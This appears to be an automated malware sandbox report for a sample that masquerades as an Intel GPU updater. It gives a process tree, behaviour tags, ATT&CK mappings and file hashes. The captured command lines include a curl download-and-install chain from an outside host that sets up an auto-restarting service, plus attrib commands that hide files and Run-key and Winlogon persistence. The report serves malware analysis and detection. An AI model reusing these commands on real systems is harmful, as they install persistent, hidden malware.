- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\test.exe" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\SysWOW64\notepad.exenotepad7⤵
- System Location Discovery: System Language Discovery
PID:2964 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 1928⤵
- Program crash
PID:2936
-
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1912
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
PID:4188 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1032 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:4044
-
-
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/nssm.exe4⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc start IntelGpuUpdater4⤵
- System Location Discovery: System Language Discovery
PID:2724 -
C:\Windows\SysWOW64\sc.exesc start IntelGpuUpdater5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50004⤵
- System Location Discovery: System Language Discovery
PID:2108 -
C:\Windows\SysWOW64\sc.exesc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50005⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:428
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:3692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2964 -ip 29641⤵PID:4984
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3348 -
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\IntelGpuUpdater.exe" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:1284 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\IntelGpuUpdater.exe" +s +h4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4592
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:2680 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows" +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4808
-
-
-
C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4392 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3864 -
C:\Windows\notepad.exenotepad5⤵
- Modifies data under HKEY_USERS
PID:4424
-
-
-
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1628
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5040
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1696
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2724
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5084
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4448
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
251KB
MD557bd4f73690590693b5b921f29679410
SHA1c2cb47bf602541043589e979f21c3d7c1698e3ac
SHA2568a3de78cf177be4c37c1525becf05af336c1dc2a4d181cae79f6903754902efa
SHA51200b543644058a93f1c0a13e4d40b1c4e76f9581325f1773d79983761ca6903643e5a44717e7785b27a8fac2a6609c19032e3f412d3339e9cc5dc697791890318
-
Filesize
256KB
MD5c721739bd54dd9beb16909f6807b73c5
SHA15ec54658246914144293357f302e68bf9972fb71
SHA2567376ce1eefd786d30efbecb716a13e9d23d27cfc362ce1bbc2fbebdf4fbf54ea
SHA5120800c5f0425237219d7d34654cc021b8b8aa1fce1545ba9815c7be12a623edb08a098fd4de40ccc867487639647cb7f316316464a3a0bdb0650fdd2852408b4e